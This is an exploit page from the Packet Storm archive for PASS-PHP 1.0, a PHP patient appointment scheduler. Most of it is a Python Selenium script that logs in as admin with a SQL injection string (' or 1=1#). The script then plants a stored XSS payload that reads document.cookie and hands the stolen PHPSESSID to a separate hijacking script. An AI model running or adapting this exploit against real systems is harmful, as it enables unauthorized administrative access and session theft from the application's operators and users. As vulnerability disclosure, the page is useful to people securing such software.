what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PASS-PHP 1.0 SQL Injection / Cross Site Scripting

PASS-PHP 1.0 SQL Injection / Cross Site Scripting
Posted Sep 27, 2021
Authored by nu11secur1ty

PASS-PHP version 1.0 suffers from remote SQL injection and cross site scripting vulnerabilities.

tags | exploit, remote, php, vulnerability, xss, sql injection
SHA-256 | 1145a2df44f5b9647b8ad4207215a93abb5fe637fa0a66c4b4596511a4b1e5f5

PASS-PHP 1.0 SQL Injection / Cross Site Scripting

Change Mirror Download
### Exploit Title: PASS-PHP (by: oretnom23 ) v1.0 is vulnerable to
remote SqL-Injection bypass Authentication, XSS-Stored and PHPSESSID
Hijacking.
### Author: nu11secur1ty
### Testing and Debugging: nu11secur1ty
### Date: 09.24.2021
### Vendor: https://www.sourcecodester.com/user/257130/activity
### Link: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
### CVE: CVE-nu11-06-092421

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-nu11-06-092421

from selenium import webdriver
import time
import os
from colorama import init, Fore, Back, Style
init(convert=True)
import requests


#enter the link to the website you want to automate login.
website_link="http://localhost/scheduler/admin/login.php"

#enter your login username
username="nu11secur1ty' or 1=1#"

#enter your login password
password="nu11secur1ty' or 1=1#"

#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="password"

browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
browser.maximize_window()
time.sleep(1)
browser.execute_script("document.querySelector('[class=\"btn
btn-primary btn-block\"]').click()")

time.sleep(1)
exploit_link="http://localhost/scheduler/admin/?page=user/manage_user"
browser.get((exploit_link))

time.sleep(3)
browser.execute_script("document.querySelector('[name=\"firstname\"]').value=\"<script>alert(document.cookie)</script>\"")
browser.execute_script("document.querySelector('[name=\"lastname\"]').value=\"<script>alert(document.cookie)</script>\"")
browser.execute_script("document.querySelector('[name=\"username\"]').value=\"PWNED_\"")
browser.execute_script("document.querySelector('[name=\"password\"]').value=\"tralala_\"")
time.sleep(1)
browser.execute_script("document.querySelector('[class=\"btn btn-sm
btn-primary mr-2\"]').click()")

coockie=browser.execute_script("return document.cookie")
coockie=coockie.split("=")[1]
print(coockie)
browser.close()

print(Fore.YELLOW +"Please wait for PoC to hijacking the PHPSESSID...\n")
print(Style.RESET_ALL)
time.sleep(7)
os.system("python PWNPHPSESSID.py " + coockie)

print(Fore.GREEN +"The payload for CVE-nu11-06 is deployed your admin
account is PWNED...\n")
print(Fore.RED +"Your Cookie: PHPSESSID is hijacked and we have
another bypass login...\n")
print(Style.RESET_ALL)

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")


------------------------------------------------------------------

### Description:
The PASS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote
SqL-Injection bypass Authentication, XSS-Stored and PHPSESSID
Hijacking.
The vulnerable app: to remote SqL - injection bypass Authentication is
"login.php", with parameters: "username" and "password".
After the successful PWNED of the credentials for the admin account,
the malicious user can be storing an XSS payload, whit who can take
the active PHPSESSID
every time when he wants to log in to the system with an admin account
by using this exploit.

-------------------------------------------------------------------
### BR
- [+] @nu11secur1ty System Administrator - Infrastructure and
Penetration Testing Engineer

-------------------------------------------------------------------
### Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-06-092421
### Proof: https://streamable.com/1o87sl
### BR nu11secur1ty


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close